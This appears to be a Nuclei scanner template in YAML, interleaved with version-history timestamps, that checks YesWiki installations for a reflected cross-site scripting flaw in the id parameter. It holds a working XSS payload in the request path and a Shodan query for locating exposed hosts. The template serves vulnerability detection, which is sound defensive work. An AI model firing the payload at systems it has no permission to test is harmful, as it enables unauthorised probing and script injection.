2022-08-08 21:08:54 +00:00
|
|
|
id: yeswiki-xss
|
|
|
|
|
|
|
|
info:
|
2022-09-23 17:53:08 +00:00
|
|
|
name: YesWiki <2022-07-07 - Cross-Site Scripting
|
2022-08-08 21:08:54 +00:00
|
|
|
author: arafatansari
|
2023-05-29 17:55:05 +00:00
|
|
|
severity: medium
|
2022-08-08 21:08:54 +00:00
|
|
|
description: |
|
2022-09-23 17:53:08 +00:00
|
|
|
YesWiki before 2022-07-07 contains a cross-site scripting vulnerability via the id parameter in the AccueiL URL.
|
2022-08-08 21:08:54 +00:00
|
|
|
reference:
|
|
|
|
- https://huntr.dev/bounties/de4db96c-2717-4c0e-b7aa-eee756ca19d3/
|
2022-09-23 17:53:08 +00:00
|
|
|
classification:
|
2023-05-29 17:55:05 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.5
|
2022-09-23 17:53:08 +00:00
|
|
|
cwe-id: CWE-79
|
2022-08-08 21:08:54 +00:00
|
|
|
metadata:
|
2022-08-09 09:47:08 +00:00
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2022-08-08 21:08:54 +00:00
|
|
|
shodan-query: http.html:"yeswiki"
|
2023-05-29 17:55:05 +00:00
|
|
|
tags: yeswiki,huntr,xss
|
2022-08-08 21:08:54 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-08 21:08:54 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-08-09 02:10:54 +00:00
|
|
|
- '{{BaseURL}}/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
2022-08-08 21:08:54 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-08-09 02:10:54 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- "<script>alert(document.domain)</script>"
|
2022-08-09 09:47:08 +00:00
|
|
|
- "Query failed:"
|
|
|
|
condition: and
|
2022-08-08 21:08:54 +00:00
|
|
|
|
|
|
|
- type: word
|
2022-08-09 02:10:54 +00:00
|
|
|
part: header
|
2022-08-08 21:08:54 +00:00
|
|
|
words:
|
2022-08-09 02:10:54 +00:00
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-19 13:13:52 +00:00
|
|
|
# digest: 490a0046304402206e24e0f336c91fb5e9ed6a3b2e6c92cecc60a311d20b0c180b888576b5b504d4022059a1c3652a4ef4c46d38f32747e9574275001159d4926a204fb2e2b431e3ca4c:922c64590222798bb761d5b6d8e72950
|